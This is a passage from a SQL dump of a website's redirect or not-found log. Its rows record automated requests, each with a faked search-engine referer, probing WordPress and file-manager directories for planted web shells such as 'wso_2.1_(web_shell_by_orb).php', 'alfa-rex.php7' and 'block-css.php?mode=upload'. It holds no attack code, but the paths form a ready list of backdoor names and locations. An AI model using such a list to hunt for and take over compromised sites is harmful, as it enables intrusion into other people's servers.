00:00:00',301),(51408,'http://3s-technologies.com.tr/en/wp-includes/customize/file.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:14','0000-00-00 00:00:00',301),(51409,'http://3s-technologies.com.tr/en/wp-fclass.php',NULL,'https://duckduckgo.com/','',14,0,'2025-12-20 04:51:15','0000-00-00 00:00:00',301),(51410,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-help/admin/wp-fclass.php',NULL,'https://www.google.fr/','',3,0,'2025-12-20 04:51:16','0000-00-00 00:00:00',301),(51411,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-help/index.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:17','0000-00-00 00:00:00',301),(51412,'http://3s-technologies.com.tr/en/wp-content/updraft/themes.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:18','0000-00-00 00:00:00',301),(51413,'http://3s-technologies.com.tr/en/wp-content/themes/intense/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:19','0000-00-00 00:00:00',301),(51414,'http://3s-technologies.com.tr/en/wp-admin/images/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:20','0000-00-00 00:00:00',301),(51415,'http://3s-technologies.com.tr/en/wp-admin/includes/block-css.php?mode=upload',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:51:21','0000-00-00 00:00:00',301),(51416,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:22','0000-00-00 00:00:00',301),(51417,'http://3s-technologies.com.tr/en/wp-admin/js/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:23','0000-00-00 00:00:00',301),(51418,'http://3s-technologies.com.tr/en/wp-admin/maint/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:23','0000-00-00 00:00:00',301),(51419,'http://3s-technologies.com.tr/en/wp-admin/network/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:24','0000-00-00 00:00:00',301),(51420,'http://3s-technologies.com.tr/en/wp-admin/user/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:25','0000-00-00 00:00:00',301),(51421,'http://3s-technologies.com.tr/en/wp-content/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:26','0000-00-00 00:00:00',301),(51422,'http://3s-technologies.com.tr/en/wp-content/uploads/block-css.php?mode=upload',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:27','0000-00-00 00:00:00',301),(51423,'http://3s-technologies.com.tr/en/wp-content/plugins/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:28','0000-00-00 00:00:00',301),(51424,'http://3s-technologies.com.tr/en/wp-content/languages/block-css.php?mode=upload',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:29','0000-00-00 00:00:00',301),(51425,'http://3s-technologies.com.tr/en/wp-content/languages/themes/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:30','0000-00-00 00:00:00',301),(51426,'http://3s-technologies.com.tr/en/wp-includes/simplepie/block-css.php?mode=upload',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:51:31','0000-00-00 00:00:00',301),(51427,'http://3s-technologies.com.tr/en/wp-includes/certificates/block-css.php?mode=upload',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:51:31','0000-00-00 00:00:00',301),(51428,'http://3s-technologies.com.tr/en/wp-includes/customize/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:32','0000-00-00 00:00:00',301),(51429,'http://3s-technologies.com.tr/en/wp-includes/pomo/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:33','0000-00-00 00:00:00',301),(51430,'http://3s-technologies.com.tr/en/wp-includes/rest-api/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:34','0000-00-00 00:00:00',301),(51431,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:35','0000-00-00 00:00:00',301),(51432,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:36','0000-00-00 00:00:00',301),(51433,'http://3s-technologies.com.tr/en/.well-known/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:37','0000-00-00 00:00:00',301),(51434,'http://3s-technologies.com.tr/en/index/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:38','0000-00-00 00:00:00',301),(51435,'http://3s-technologies.com.tr/en/about/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:39','0000-00-00 00:00:00',301),(51436,'http://3s-technologies.com.tr/en/as/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:39','0000-00-00 00:00:00',301),(51437,'http://3s-technologies.com.tr/en/file/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:40','0000-00-00 00:00:00',301),(51438,'http://3s-technologies.com.tr/en/chosen/block-css.php?mode=upload',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:41','0000-00-00 00:00:00',301),(51439,'http://3s-technologies.com.tr/en/css/block-css.php?mode=upload',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:42','0000-00-00 00:00:00',301),(51440,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:43','0000-00-00 00:00:00',301),(51441,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:44','0000-00-00 00:00:00',301),(51442,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:45','0000-00-00 00:00:00',301),(51443,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:46','0000-00-00 00:00:00',301),(51444,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:51:47','0000-00-00 00:00:00',301),(51445,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:51:48','0000-00-00 00:00:00',301),(51446,'http://3s-technologies.com.tr/en/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:48','0000-00-00 00:00:00',301),(51447,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/block-css.php?mode=upload',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:49','0000-00-00 00:00:00',301),(51448,'http://3s-technologies.com.tr/en/wp-admin/images/rk2.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:50','0000-00-00 00:00:00',301),(51449,'http://3s-technologies.com.tr/en/wp-admin/includes/rk2.php',NULL,'https://www.google.com/','',29,0,'2025-12-20 04:51:51','0000-00-00 00:00:00',301),(51450,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:53','0000-00-00 00:00:00',301),(51451,'http://3s-technologies.com.tr/en/wp-admin/js/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:54','0000-00-00 00:00:00',301),(51452,'http://3s-technologies.com.tr/en/wp-admin/maint/rk2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:55','0000-00-00 00:00:00',301),(51453,'http://3s-technologies.com.tr/en/wp-admin/network/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:56','0000-00-00 00:00:00',301),(51454,'http://3s-technologies.com.tr/en/wp-admin/user/rk2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:57','0000-00-00 00:00:00',301),(51455,'http://3s-technologies.com.tr/en/wp-content/rk2.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:58','0000-00-00 00:00:00',301),(51456,'http://3s-technologies.com.tr/en/wp-content/uploads/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:59','0000-00-00 00:00:00',301),(51457,'http://3s-technologies.com.tr/en/wp-content/plugins/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:00','0000-00-00 00:00:00',301),(51458,'http://3s-technologies.com.tr/en/wp-content/languages/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:01','0000-00-00 00:00:00',301),(51459,'http://3s-technologies.com.tr/en/wp-content/languages/themes/rk2.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:52:02','0000-00-00 00:00:00',301),(51460,'http://3s-technologies.com.tr/en/wp-includes/simplepie/rk2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:03','0000-00-00 00:00:00',301),(51461,'http://3s-technologies.com.tr/en/wp-includes/certificates/rk2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:04','0000-00-00 00:00:00',301),(51462,'http://3s-technologies.com.tr/en/wp-includes/customize/rk2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:05','0000-00-00 00:00:00',301),(51463,'http://3s-technologies.com.tr/en/wp-includes/pomo/rk2.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:52:06','0000-00-00 00:00:00',301),(51464,'http://3s-technologies.com.tr/en/wp-includes/rest-api/rk2.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:52:07','0000-00-00 00:00:00',301),(51465,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/rk2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:08','0000-00-00 00:00:00',301),(51466,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:09','0000-00-00 00:00:00',301),(51467,'http://3s-technologies.com.tr/en/.well-known/rk2.php',NULL,'https://www.yahoo.com/','',22,0,'2025-12-20 04:52:10','0000-00-00 00:00:00',301),(51468,'http://3s-technologies.com.tr/en/index/rk2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:11','0000-00-00 00:00:00',301),(51469,'http://3s-technologies.com.tr/en/about/rk2.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:52:12','0000-00-00 00:00:00',301),(51470,'http://3s-technologies.com.tr/en/as/rk2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:13','0000-00-00 00:00:00',301),(51471,'http://3s-technologies.com.tr/en/file/rk2.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:52:14','0000-00-00 00:00:00',301),(51472,'http://3s-technologies.com.tr/en/chosen/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:14','0000-00-00 00:00:00',301),(51473,'http://3s-technologies.com.tr/en/css/rk2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:15','0000-00-00 00:00:00',301),(51474,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/rk2.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:52:16','0000-00-00 00:00:00',301),(51475,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:17','0000-00-00 00:00:00',301),(51476,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:18','0000-00-00 00:00:00',301),(51477,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:19','0000-00-00 00:00:00',301),(51478,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:20','0000-00-00 00:00:00',301),(51479,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:20','0000-00-00 00:00:00',301),(51480,'http://3s-technologies.com.tr/en/ajaxfilemanager/rk2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:21','0000-00-00 00:00:00',301),(51481,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/rk2.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:52:22','0000-00-00 00:00:00',301),(51482,'http://3s-technologies.com.tr/en/rk2.php',NULL,'https://www.yahoo.com/','',3,0,'2025-12-20 04:52:23','0000-00-00 00:00:00',301),(51483,'http://3s-technologies.com.tr/en/wp-admin/includes/license.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:25','0000-00-00 00:00:00',301),(51484,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/license.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:26','0000-00-00 00:00:00',301),(51485,'http://3s-technologies.com.tr/en/css/license.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:52:26','0000-00-00 00:00:00',301),(51486,'http://3s-technologies.com.tr/en/cgi-bin/license.php',NULL,'https://www.yahoo.com/','',1,0,'2025-12-20 04:52:27','0000-00-00 00:00:00',301),(51487,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/license.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:28','0000-00-00 00:00:00',301),(51488,'http://3s-technologies.com.tr/en/mariju.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:30','0000-00-00 00:00:00',301),(51489,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/providers/mariju.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:31','0000-00-00 00:00:00',301),(51490,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/mariju.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:52:31','0000-00-00 00:00:00',301),(51491,'http://3s-technologies.com.tr/en/cgi-bin/mariju.php',NULL,'https://www.bing.com/','',1,0,'2025-12-20 04:52:32','0000-00-00 00:00:00',301),(51492,'http://3s-technologies.com.tr/en/wp-includes/ixr/mariju.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:33','0000-00-00 00:00:00',301),(51493,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/mariju.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:34','0000-00-00 00:00:00',301),(51494,'http://3s-technologies.com.tr/en/images/mariju.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:35','0000-00-00 00:00:00',301),(51495,'http://3s-technologies.com.tr/en/wp-includes/php-compat/mariju.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:52:36','0000-00-00 00:00:00',301),(51496,'http://3s-technologies.com.tr/en/wp-admin/maint/mariju.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:37','0000-00-00 00:00:00',301),(51497,'http://3s-technologies.com.tr/en/wp-includes/id3/mariju.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:38','0000-00-00 00:00:00',301),(51498,'http://3s-technologies.com.tr/en/wp-admin/includes/mariju.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:52:38','0000-00-00 00:00:00',301),(51499,'http://3s-technologies.com.tr/en/wp-includes/customize/mariju.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:40','0000-00-00 00:00:00',301),(51500,'http://3s-technologies.com.tr/en/wp-admin/network/mariju.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:41','0000-00-00 00:00:00',301),(51501,'http://3s-technologies.com.tr/en/sgd.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:42','0000-00-00 00:00:00',301),(51502,'http://3s-technologies.com.tr/en/webdb.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:47','0000-00-00 00:00:00',301),(51503,'http://3s-technologies.com.tr/en/wp-admin/network/theme-inshpvx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:52:48','0000-00-00 00:00:00',301),(51504,'http://3s-technologies.com.tr/en/theme-inshpvx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:52:49','0000-00-00 00:00:00',301),(51505,'http://3s-technologies.com.tr/en/wp-includes/images/include.phps',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:52','0000-00-00 00:00:00',301),(51506,'http://3s-technologies.com.tr/en/phpmailer.lang-sv.php',NULL,'https://www.bing.com/','',7,0,'2025-12-20 04:52:53','0000-00-00 00:00:00',301),(51507,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/lofter.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:52:54','0000-00-00 00:00:00',301),(51508,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/lofter.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:52:55','0000-00-00 00:00:00',301),(51509,'http://3s-technologies.com.tr/en/wp-content/uploads/wpr-addons/forms/b1ack.php',NULL,'https://www.google.fr/','',7,0,'2025-12-20 04:52:56','0000-00-00 00:00:00',301),(51510,'http://3s-technologies.com.tr/en/wp-includes/certificates/plugins.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:52:57','0000-00-00 00:00:00',301),(51511,'http://3s-technologies.com.tr/en/wp-admin/user/plugins.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:52:58','0000-00-00 00:00:00',301),(51512,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:52:59','0000-00-00 00:00:00',301),(51513,'http://3s-technologies.com.tr/en/wp-includes/customize/plugins.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:00','0000-00-00 00:00:00',301),(51514,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/plugins.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:01','0000-00-00 00:00:00',301),(51515,'http://3s-technologies.com.tr/en/wp-content/themes/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:02','0000-00-00 00:00:00',301),(51516,'http://3s-technologies.com.tr/en/wp-includes/id3/plugins.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:02','0000-00-00 00:00:00',301),(51517,'http://3s-technologies.com.tr/en/wp-admin/css/plugins.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:03','0000-00-00 00:00:00',301),(51518,'http://3s-technologies.com.tr/en/wp-admin/includes/plugins.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:04','0000-00-00 00:00:00',301),(51519,'http://3s-technologies.com.tr/en/wp-admin/network/plugins.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:05','0000-00-00 00:00:00',301),(51520,'http://3s-technologies.com.tr/en/wp-admin/images/plugins.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:06','0000-00-00 00:00:00',301),(51521,'http://3s-technologies.com.tr/en/wp-admin/maint/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:07','0000-00-00 00:00:00',301),(51522,'http://3s-technologies.com.tr/en/wp-content/upgrade/plugins.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:08','0000-00-00 00:00:00',301),(51523,'http://3s-technologies.com.tr/en/images/plugins.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:08','0000-00-00 00:00:00',301),(51524,'http://3s-technologies.com.tr/en/css/plugins.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:09','0000-00-00 00:00:00',301),(51525,'http://3s-technologies.com.tr/en/wp-includes/fonts/plugins.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:10','0000-00-00 00:00:00',301),(51526,'http://3s-technologies.com.tr/en/wp-includes/pomo/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:11','0000-00-00 00:00:00',301),(51527,'http://3s-technologies.com.tr/en/.tmb/plugins.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:12','0000-00-00 00:00:00',301),(51528,'http://3s-technologies.com.tr/en/wp-includes/ixr/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:13','0000-00-00 00:00:00',301),(51529,'http://3s-technologies.com.tr/en/cgi-bin/plugins.php',NULL,'https://www.google.fr/','',1,0,'2025-12-20 04:53:14','0000-00-00 00:00:00',301),(51530,'http://3s-technologies.com.tr/en/wp-includes/random_compat/plugins.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:15','0000-00-00 00:00:00',301),(51531,'http://3s-technologies.com.tr/en/wp-content/languages/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:16','0000-00-00 00:00:00',301),(51532,'http://3s-technologies.com.tr/en/chtmlfuns.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:16','0000-00-00 00:00:00',301),(51533,'http://3s-technologies.com.tr/en/hinfofuns.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:17','0000-00-00 00:00:00',301),(51534,'http://3s-technologies.com.tr/en/comdofuns.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:19','0000-00-00 00:00:00',301),(51535,'http://3s-technologies.com.tr/en/schallfuns.php',NULL,'https://www.google.de/','',3,0,'2025-12-20 04:53:20','0000-00-00 00:00:00',301),(51536,'http://3s-technologies.com.tr/en/qinfofuns.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:22','0000-00-00 00:00:00',301),(51537,'http://3s-technologies.com.tr/en/shellname.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:24','0000-00-00 00:00:00',301),(51538,'http://3s-technologies.com.tr/en/wp-rewrite.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:24','0000-00-00 00:00:00',301),(51539,'http://3s-technologies.com.tr/en/docs/docs/cache.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:26','0000-00-00 00:00:00',301),(51540,'http://3s-technologies.com.tr/en/docs/docs/index.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:27','0000-00-00 00:00:00',301),(51541,'http://3s-technologies.com.tr/en/docs/docs/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:28','0000-00-00 00:00:00',301),(51542,'http://3s-technologies.com.tr/en/docs/docs/alfa-rex.php7',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:28','0000-00-00 00:00:00',301),(51543,'http://3s-technologies.com.tr/en/docs/docs/alfa-rex.php8',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:29','0000-00-00 00:00:00',301),(51544,'http://3s-technologies.com.tr/en/docs/docs/alfa-rex.php56',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:30','0000-00-00 00:00:00',301),(51545,'http://3s-technologies.com.tr/en/docs/docs/about.php7',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:31','0000-00-00 00:00:00',301),(51546,'http://3s-technologies.com.tr/en/l10n.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:32','0000-00-00 00:00:00',301),(51547,'http://3s-technologies.com.tr/en/cgi-bin/themes.php',NULL,'https://www.google.fr/','',1,0,'2025-12-20 04:53:34','0000-00-00 00:00:00',301),(51548,'http://3s-technologies.com.tr/en/lion.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:37','0000-00-00 00:00:00',301),(51549,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/blue.php?wall=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:39','0000-00-00 00:00:00',301),(51550,'http://3s-technologies.com.tr/en/wp-content/themes/jaida/lang.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:40','0000-00-00 00:00:00',301),(51551,'http://3s-technologies.com.tr/en/wp-includes/ixr/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:41','0000-00-00 00:00:00',301),(51552,'http://3s-technologies.com.tr/en/wp-includes/fonts/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:42','0000-00-00 00:00:00',301),(51553,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:43','0000-00-00 00:00:00',301),(51554,'http://3s-technologies.com.tr/en/wp-admin/images/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:47','0000-00-00 00:00:00',301),(51555,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-class.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:48','0000-00-00 00:00:00',301),(51556,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-class.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:49','0000-00-00 00:00:00',301),(51557,'http://3s-technologies.com.tr/en/wp-admin/js/wp-class.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:50','0000-00-00 00:00:00',301),(51558,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-class.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:53:51','0000-00-00 00:00:00',301),(51559,'http://3s-technologies.com.tr/en/wp-admin/network/wp-class.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:53:52','0000-00-00 00:00:00',301),(51560,'http://3s-technologies.com.tr/en/wp-admin/user/wp-class.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:52','0000-00-00 00:00:00',301),(51561,'http://3s-technologies.com.tr/en/wp-content/wp-class.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:53:53','0000-00-00 00:00:00',301),(51562,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:54','0000-00-00 00:00:00',301),(51563,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-class.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:53:55','0000-00-00 00:00:00',301),(51564,'http://3s-technologies.com.tr/en/wp-content/languages/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:56','0000-00-00 00:00:00',301),(51565,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp-class.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:53:57','0000-00-00 00:00:00',301),(51566,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp-class.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:58','0000-00-00 00:00:00',301),(51567,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:53:58','0000-00-00 00:00:00',301),(51568,'http://3s-technologies.com.tr/en/wp-includes/customize/wp-class.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:53:59','0000-00-00 00:00:00',301),(51569,'http://3s-technologies.com.tr/en/index/wp-class.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:54:00','0000-00-00 00:00:00',301),(51570,'http://3s-technologies.com.tr/en/about/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:54:01','0000-00-00 00:00:00',301),(51571,'http://3s-technologies.com.tr/en/as/wp-class.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:54:02','0000-00-00 00:00:00',301),(51572,'http://3s-technologies.com.tr/en/file/wp-class.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:54:03','0000-00-00 00:00:00',301),(51573,'http://3s-technologies.com.tr/en/chosen/wp-class.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:04','0000-00-00 00:00:00',301),(51574,'http://3s-technologies.com.tr/en/css/wp-class.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:54:04','0000-00-00 00:00:00',301),(51575,'http://3s-technologies.com.tr/en/wso_2.1_(web_shell_by_orb).php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:54:06','0000-00-00 00:00:00',301),(51576,'http://3s-technologies.com.tr/en/1998.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:54:08','0000-00-00 00:00:00',301),(51577,'http://3s-technologies.com.tr/en/wp-content/plugins/akismet/akismet.php',NULL,'https://www.yahoo.com/','',8,0,'2025-12-20 04:54:10','0000-00-00 00:00:00',301),(51578,'http://3s-technologies.com.tr/en/images/stories/w.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:54:11','0000-00-00 00:00:00',301),(51579,'http://3s-technologies.com.tr/en/cpn.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:54:13','0000-00-00 